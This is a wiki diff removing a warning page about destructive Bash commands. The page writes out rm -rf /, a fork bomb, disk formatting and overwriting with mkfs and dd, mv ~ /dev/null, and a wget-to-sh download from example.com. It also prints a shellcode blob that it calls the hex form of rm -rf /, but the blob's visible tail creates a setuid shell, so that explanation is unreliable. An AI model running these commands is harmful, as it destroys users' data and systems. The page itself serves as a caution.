Differences

This shows you the differences between two versions of the page.

--- bash:dangerous_commands [2019/11/24 20:17] – peter
+++ bash:dangerous_commands [2021/01/26 16:19] (current) – removed peter
@@ Line 1: / Line 1: @@
-====== Bash - Dangerous Commands ======
-<WRAP alert>
-**ALERT**:  These are very dangerous and may cause serious problems to your system.
-</WRAP>
-----
-===== rm -rf / =====
-<code bash>
-rm -rf /
-</code>
-The command **rm -rf /** deletes everything it possible can, including files on your hard drive and files on connected removable media devics.  This command is more understandable if it’s broken down:
-  * **rm** – Remove the following files.
-  * **-rf** – Run rm recursively (delete all files and folders inside the specified folder) and force-remove all files without prompting you.
-  * **/** – Tells rm to start at the root directory, which contains all the files on your computer and all mounted media devices, including remote file shares and removable drives.
-Linux will happily obey this command and delete everything without prompting you, so be careful when using it!  The **rm** command can also be used in other dangerous ways – **rm –rf ~** would delete all files in your home folder, while **rm -rf .*** would delete all your configuration files.
-The Lesson:  Beware **rm -rf**.
-----
-===== Disguised rm –rf / =====
-<code bash>
-char esp[] __attribute__ ((section(“.text”))) /* e.s.p
-release */
-= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68”
-“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99”
-“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7”
-“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56”
-“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31”
-“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69”
-“\x6e\x2f\x73\x68\x00\x2d\x63\x00”
-“cp -p /bin/sh /tmp/.beyond; chmod 4755
-/tmp/.beyond;”;
-</code>
-This is the hex version of **rm –rf /** – executing this command would wipe out your files just as if you had run **rm –rf /**.
-The Lesson:  Don’t run weird-looking, obviously disguised commands that you don’t understand.
-----
-===== :(){ :|: & };: =====
-Fork Bomb.  The following line is a simple-looking, but dangerous, bash function:
-<code bash>
-:(){ :|: & };:
-</code>
-This short line defines a shell function that creates new copies of itself.  The process continually replicates itself, and its copies continually replicate themselves, quickly taking up all your CPU time and memory.  This can cause your computer to freeze.  It’s basically a denial-of-service attack.
-The Lesson:  Bash functions are powerful, even very short ones.
-----
-===== mkfs.ext4 /dev/sda1 =====
-<code bash>
-mkfs.ext4 /dev/sda1
-</code>
-Formats a Hard Drive.  The **mkfs.ext4 /dev/sda1** command is simple to understand:
-  * **mkfs.ext4** – Create a new ext4 file system on the following device.
-  * **/dev/sda1** – Specifies the first partition on the first hard drive, which is probably in use.
-Taken together, this command can be equivalent to running **format c:** on Windows – it will wipe the files on your first partition and replace them with a new file system.
-This command can come in other forms as well – **mkfs.ext3 /dev/sdb2** would format the second partition on the second hard drive with the ext3 file system.
-The Lesson:  Beware running commands directly on hard disk devices that begin with /dev/sd.
-----
-===== command > /dev/sda =====
-<code bash>
-any_command > /dev/sda
-</code>
-Writes Directly to a Hard Drive.  The **command > /dev/sda** line works similarly – it runs a command and sends the output of that command directly to your first hard drive, writing the data directly to the hard disk drive and damaging your file system.
-  * **command** – Run a command (can be any command.)
-  * **>** – Send the output of the command to the following location.
-  * **/dev/sda** – Write the output of the command directly to the hard disk device.
-The Lesson:  As above, beware running commands that involve hard disk devices beginning with /dev/sd.
-----
-===== dd if=/dev/random of=/dev/sda =====
-<code bash>
-dd if=/dev/random of=/dev/sda
-</code>
-Writes Junk Onto a Hard Drive.  The **dd if=/dev/random of=/dev/sda** line will also obliterate the data on one of your hard drives.
-  * **dd** – Perform low-level copying from one location to another.
-  * **if=/dev/random** – Use /dev/random (random data) as the input – you may also see locations such as /dev/zero (zeros).
-  * **of=/dev/sda** – Output to the first hard disk, replacing its file system with random garbage data.
-The Lesson:  **dd** copies data from one location to another, which can be dangerous if you’re copying directly to a device.
-----
-===== mv ~ /dev/null =====
-<code bash>
-mv ~ /dev/null
-</code>
-Moves Your Home Directory to a Black Hole.  **/dev/null** is another special location – moving something to **/dev/null** is the same thing as destroying it.  Think of **/dev/null** as a black hole.  Essentially, **mv ~ /dev/null** sends all your personal files into a black hole.
-  * **mv** – Move the following file or directory to another location.
-  * **~** – Represents your entire home folder.
-  * **/dev/null** – Move your home folder to /dev/null, destroying all your files and deleting the original copies.
-The Lesson:  The **~** character represents your home folder and moving things to **/dev/null** destroys them.
-----
-===== wget http://example.com/something -O – | sh =====
-<code bash>
-wget http://example.com/something -O – | sh
-</code>
-Downloads and Runs a Script.  The above line downloads a script from the web and sends it to sh, which executes the contents of the script.  This can be dangerous if you’re not sure what the script is or if you don’t trust its source – don’t run untrusted scripts.
-  * **wget** – Downloads a file. (You may also see curl in place of wget.)
-  * **<nowiki>http://example.com/something</nowiki>** – Download the file from this location.
-  * **|** – Pipe (send) the output of the wget command (the file you downloaded) directly to another command.
-  * **sh** – Send the file to the sh command, which executes it if it’s a bash script.
-The Lesson:  Don’t download and run untrusted scripts from the web, even with a command.
-----
-===== References: =====
-  * http://www.howtogeek.com/125157/8-deadly-commands-you-should-never-run-on-linux/